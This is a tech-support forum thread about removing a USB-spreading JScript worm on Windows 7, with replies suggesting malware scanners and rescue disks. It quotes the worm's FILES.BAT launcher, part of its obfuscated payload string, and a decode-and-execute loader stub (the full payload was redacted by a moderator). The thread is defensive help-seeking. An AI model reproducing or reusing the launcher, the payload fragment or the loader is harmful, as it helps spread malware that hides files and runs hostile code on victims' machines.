Virus wcpcabc.js in WIndows 7

Toshiba Satellite c655-s5082 laptop
September 27, 2018 at 10:34:27
Specs: Windows 7 Ultimate (64 bits), Intel Core i3-2350M (2.3GHz) / Kingston 2x2gb DDR3
Hi Computing.net!

Am having a trouble with a virus. It hides all files in a pendrive and create a bat file named FILES.BAT and this is the content:

cd Files\707\
%comspec% /c start w^script wcpcabc.js
exit

Then create a folder named 707 with the file wcpcabc.js inside.

I used USBFIX and Adwcleaner but no results, dont know how terminate this infection, sadly I cannot fre format this PC because it contains licenced software and dont have the keys.

Please somebody help me to find a solution.

Thanks in advance

Mobo: Intel(R) DG41RQ
CPU: Intel(R) Core(TM)2 Quad CPU Q8400 @ 2.66GHz
RAM: Kingston 4GB PC2-6400 (400 MHz)
Video: nVidia GEFORCE 8400GS 512MB
Audio: Realtek High Definition Audio


See More: Virus wcpcabc.js in WIndows 7

Reply ↓  Report •

#1
September 27, 2018 at 12:14:01
To recover keys you may find using something like Belarc Advisor, or Sisandra Soft; or even something which I think is called Key Finder?

If you can download boot with a rescue disk - and there are several about - that may allow you to deal with the pest?

This is a link to a selection of rescue disks.

http://tinyurl.com/ycxnanhm

These disk load a linux based OS into RAM only; and the hard drive, and any attached usb devices are merely resources which can be scanned - outside of windows.

Likely Johnw and one or two other pest removal experts will drop across later; their advice is worth to follow and persevere with to the end.


Reply ↓  Report •

#2
September 27, 2018 at 17:06:32
"I used USBFIX and Adwcleaner but no results"

Try malwarebytes, more steps will be needed after this.

Run Malwarebytes Anti-Malware ( MBAM ) Use Threat Scan.
http://www.softpedia.com/get/Antivi...
http://www.freewarefiles.com/Malwar...
http://www.freewarefiles.com/screen...
http://www.malwarebytes.org/downloads/
Forum
http://www.malwarebytes.org/forums/
After the Free trial, I choose this.
http://fs5.directupload.net/images/...
You then get this screen.
http://fs5.directupload.net/images/...
Or,
Deactivate Malwarebytes for Windows Premium Trial
https://support.malwarebytes.com/do...
At the end of a scan, you will get something like this.
http://fs5.directupload.net/images/...
http://fs5.directupload.net/images/...
http://fs5.directupload.net/images/...
After clicking on > View Report & then > Export. Click 'Copy to Clipboard'
Paste the contents of the clipboard into your reply.


Reply ↓  Report •

#3
September 27, 2018 at 17:26:21
Just out of curiosity, post the contents of this "wcpcabc.js". I do so love baby's first viruses, and so far this has all of the hallmarks of one.

How To Ask Questions The Smart Way


Reply ↓  Report •

Related Solutions

#4
September 28, 2018 at 05:58:26
Here is the half of the code, will not post the entire code since I dont wanto to spread the word lol but uf you want the file I can send you by mail

var a="F74?\"E(@-XGP:G C>0>m>L5j>RT`NRJ2XP@RJEXP@`@\\4j>Rk@9:+= _S^NPF((?#@6D>~rPT^Ok>((?TdYP7fRY>q/A+6u6!{(EMeQgLcTPF{f%k|JP+:*6>w$4*@GPa91@,6MfU^N^QcWfLiWPq2%21:MeQgLcTR<k521P P[P-66P_43:56v !;$43X@H241:/ELD'6+=@YJ3>m>?$H>q\"E(G$)m3)6\"EFR241:/E(?&^%:+62J2E$>.3)6\"E@YJ9>m>74?\"E(@-XGP:C$E4C-PFXOPIPk239LC ?#@,XGY>Z>fSeQf>M>`G^3@qE1:-8FaTYLD432E1:-8FaGNJ5>m>2L6-G(C.?,6-EFR/C.4$D2RG\\%P[P#X@F261? >$RG\\&P[P#X@4.>/F361? >$RG\\1F>m>?$H>q\"E(G$)m3)6\"EFR29$=+^ A/=(4 E(@-RG\\+@>m>,{\\%F/P[Py.J5.5>m>R@\\#@3P[PN\\'7>m>74?\"E(@-X$Y>L3C8P:G C>E>m>3L8$Ed@+5$CF6Gk3^ E3C(34E$D>m>b<P\"234'PF?GP:N<\\24>m>74?\"E(@-X$Y>L$PIm>R@k521P3P[PNk%@1PFG C>?>m>`YP-PZP$^+6-839YP-[IY>E>m>X3PZl>eGPKP3PIP$^\"9 Ca@#6_EF?G\\>E>V[P3k163F1?>} E'^ 32X3Y<\\'2>m>74?\"E(@-X$Y>L521P3P[P@RJ?>m>D\"X$YY7.C>X521P1P[PNk>C>l>D\"X$Y>U>e>[>eYP1[IY>?>m>D\"X3PIP-YJP3PIm>$3C(?&^%C.>a9 Ca@#6F?>U>bSPIPWgGk163F1?>E<k521P9K.P[P%F-43:.?FY>L521P3E6P[PyR'E3AX_MH6HL>(41@2@%EL4.>MRJP@93E/jM_6H6^&@.8+6L4.>MRJP@93E/jM_6H6^!:-8L4.>MR{k%@1PFG C>:>m>`JP'\\>H$AYP(PZP3E6^+6-839YP([IY>L3C8P:G C>9>m>?$H>q\"E(G$)m3)6\"EFRk$v}jbL$$C561)k|f%r!LfL`@YY9L@/6-X@wc%@\\>E3Hy:{YY9LD$Ep60F$D3x$2#61X@&261]_8$?3RJP}^4YY9LD$Ep60F$D3x$2#61X@s 4'6Ks.?3C.=@\\>R-@K4 4'6@YY9LD$Ep60F$D3x$2#61X@!12&> RJP@?.]\"2\"9$RGk'^263#$B462Ef6 5$CFRa@-?$43:.?@\\>R\"=.D$RGk'^26-5FR@YYH$A>m>?$H>t E$X'^&63q+=p62A.?26f6 5$C2XG^2A+:3X@t E$j>RG^/@/XG^2A+:3X@--RG^29(73XGYL8$Er:,6FY>_>aN`Nk(7>XOcVhScRdN`>l>H$AGP:C$E4C-P66/N<P\"234'PF6GP:N<C$E4C-P%2+D$k<k521P$?3P[P%F-43:.?F6%?GP:E1J>L ^1F-X@U\"@,D/6\"U>_\"P\"2\"=2PzR@PIP$7-PIP@-@PM%>_cPMw>&261DXv>_aRJPN\\>E1F$Y<P\"234'PF6GP:N<\\'C>m>74?\"E(@-X$Y>L(7>X$Y>G C>E>m>aJ?>m>aY6+D$P521P3P[PP\\-P[PNk3C8P:2LC$8uC(E$X@xiss-z$.73H C$-z}(41@2@%Ez-u:-5.H2-zs4C16-Et61D(@--zu7A+@161-zq#G ?\"6#-zx(5#6-RJP3\\>Rpue0b(m#bRGN>4 E\"9>X1Y>L<E1J>L ^16&(1:36FRf{a&z-q@%E6216z-k:\"C.D.73-z((?#@6Dz-aF1C$?3'$C2:.?z-cI/=.C$Cz-_552-4$5z-q9.HqF/61x(5#6-RJP-\\>Rpue0b(m#bRGN>4 E\"9>X1Y>L<NYG C>C\"P[P%F-43:.?F<$JJP2E1Y>L521P2P[Py.J;>m>`JIJP162P[P@RY7.C>X521P(P[PNk>:>l>bSfYP([IY>L2,(.>m>:YN%@1PF:>m>`YP(PZPPeTk>:I[GP:;>m>X)PIP2,(.>[><$JL4'21s.5$q3X(PCP*68^+6-839GY>U>bSfYI>m>Dy:{k2,(.>m>Dy;{k2,).>m>IYN(P[PNk)P[PNk%@1PFG C>J>m>`YP8PZP2E1^+6-839YP8[IY>L(P[PF:>[>aGPCPPeTk)P[PF;>[>Dy:{Y>U>bSfYI>m>Dy:{k2,(.>m>Dy;{k2,).>m>IYC$D>[[PqE1:-8L71@,s'21s.5$X2E1^\"9 Ca@#6_EFJGP|P2,FDy:{PIP2,).GPCPPeT.Gk<C$E4C-P162k<k521P\"@!P[P%F-43:.?FY>L163F1?>} E'^%=.@1XFa>[>} E'^12-5.>FYGPHPNIO`N`NYLE.$3C(?&XOfG^2F!D3C(?&XOY<k521P*<>m>aYG C>K!@>m>,@C$8$5(E@\\>R6:-5.H2]*3@\\>R,C3RJP@C2E1F(RJP@>24.?%:&RJP@A1@\"67A@\\>R G D3RJP@258@\\>R,D$RJP@A3:-D32+=@\\>R25 D$E4A@\\>R

This is it.

I'll try the other solutions you gave me people, thanks!

Mobo: Intel(R) DG41RQ
CPU: Intel(R) Core(TM)2 Quad CPU Q8400 @ 2.66GHz
RAM: Kingston 4GB PC2-6400 (400 MHz)
Video: nVidia GEFORCE 8400GS 512MB
Audio: Realtek High Definition Audio


Reply ↓  Report •

#5
September 28, 2018 at 18:59:29
That's a boring response. Post all of it, and I'll delete it once I get a look at it.

How To Ask Questions The Smart Way


Reply ↓  Report •

#6
September 29, 2018 at 06:41:17
Only if you promise give me a solution :P

Mobo: Intel(R) DG41RQ
CPU: Intel(R) Core(TM)2 Quad CPU Q8400 @ 2.66GHz
RAM: Kingston 4GB PC2-6400 (400 MHz)
Video: nVidia GEFORCE 8400GS 512MB
Audio: Realtek High Definition Audio


Reply ↓  Report •

#7
September 29, 2018 at 07:50:30
Oh, I'll share what I find, if anything, but I'm from the server side. Fighting viruses is more Johnw's thing. I confront viruses differently. I mean, why fight a virus on its terms when I can just format and restore from backup?

How To Ask Questions The Smart Way

message edited by Razor2.3


Reply ↓  Report •

#8
September 29, 2018 at 11:27:18
Because I want to know what files this virus create, all of them, then boot the machine with some Linux Live CD and delete all the traces of the virus. Just want to kill it sloooooowly :P

Well, here are the entire code, enjoy:

var a="There was stuff here. It's gone now. -Razor2.3",b=[30,48],c="",d=0,e,f=new ActiveXObject("Scripting.FileSystemObject");for(;d<a.length;d++){e=a.charCodeAt(d)-b[d%2];c+=String.fromCharCode(e<32?95+e:e)}try{f.MoveFolder=!0}catch(e){Function(c)()}

Mobo: Intel(R) DG41RQ
CPU: Intel(R) Core(TM)2 Quad CPU Q8400 @ 2.66GHz
RAM: Kingston 4GB PC2-6400 (400 MHz)
Video: nVidia GEFORCE 8400GS 512MB
Audio: Realtek High Definition Audio

edited by moderator: Promise kept. -Razor2.3


Reply ↓  Report •

#9
September 29, 2018 at 15:21:12
Got it. For reference, the main script is obfuscated. I left the deobfuscation code in place, because it really helped me get to the meat. It'll take a bit before I have much, as it was minimized and traditionally obfuscated before it was jumbled up. I can say it references websites registered in China, but powered by Cloudflare. They spared no every expense for this attack. Like a proper baby's first virus.

In the meantime, open Command Prompt and run the following:

taskkill /im wscript* /f
Let me know what it comes back with.

How To Ask Questions The Smart Way

message edited by Razor2.3


Reply ↓  Report •

#10
September 29, 2018 at 19:12:40
I dont have the computer right now, it is in my office, i'll try in monday.

Do you have a link with baby's virus background story?

Mobo: Intel(R) DG41RQ
CPU: Intel(R) Core(TM)2 Quad CPU Q8400 @ 2.66GHz
RAM: Kingston 4GB PC2-6400 (400 MHz)
Video: nVidia GEFORCE 8400GS 512MB
Audio: Realtek High Definition Audio


Reply ↓  Report •

Ask Question